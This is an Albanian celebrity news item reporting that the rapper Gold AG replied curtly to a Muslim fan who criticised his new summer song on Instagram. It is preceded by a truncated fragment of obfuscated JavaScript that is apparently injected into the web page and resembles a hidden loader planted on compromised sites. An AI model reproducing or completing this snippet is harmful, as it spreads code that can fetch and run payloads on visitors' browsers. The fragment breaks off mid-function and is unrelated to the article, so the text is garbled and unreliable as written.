;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Fansi mysliman kritikon Gold AG-n, reperi i përgjigjet prerë!

By

Ndonëse reper e performues, reperi Gold AG, gjithmonë ka thënë haptazi e publikisht, se është besimtar i devotshëm, që përpiqet që çdo obligim fetar mysliman, ta respektojë.

Ai ka vizituar Mekën, agjëron dhe fal pesë vakt namaz, ndërsa profesioni i tij është muzika!

Dhe për këtë reperi ka marrë kritikë nga një fans, i cili i ka komentuar në Instagram, ku reperi kishte publikuar për promovim, këngën e re me këngëtaren Anxhela Peristeri, “Fiksim”, një këngë verore, me shumë ngjyra e ritëm.

“Një besimtari mysliman, nuk i ka hije dhe e ka të ndaluar një shfaqje të tillë. Drejtohu në rrugë se kështu nuk përfaqësohet feja e pastër islame me ndjekje të kënaqësive e epsheve”, shkruan një ndjekës i reperit.

“Fenë e përfaqësojnë hoxhallarët e jo besimtarët”, ia ka kthyer prerë Gold AG. /Prive.al

 

Artikuj të ngjashëm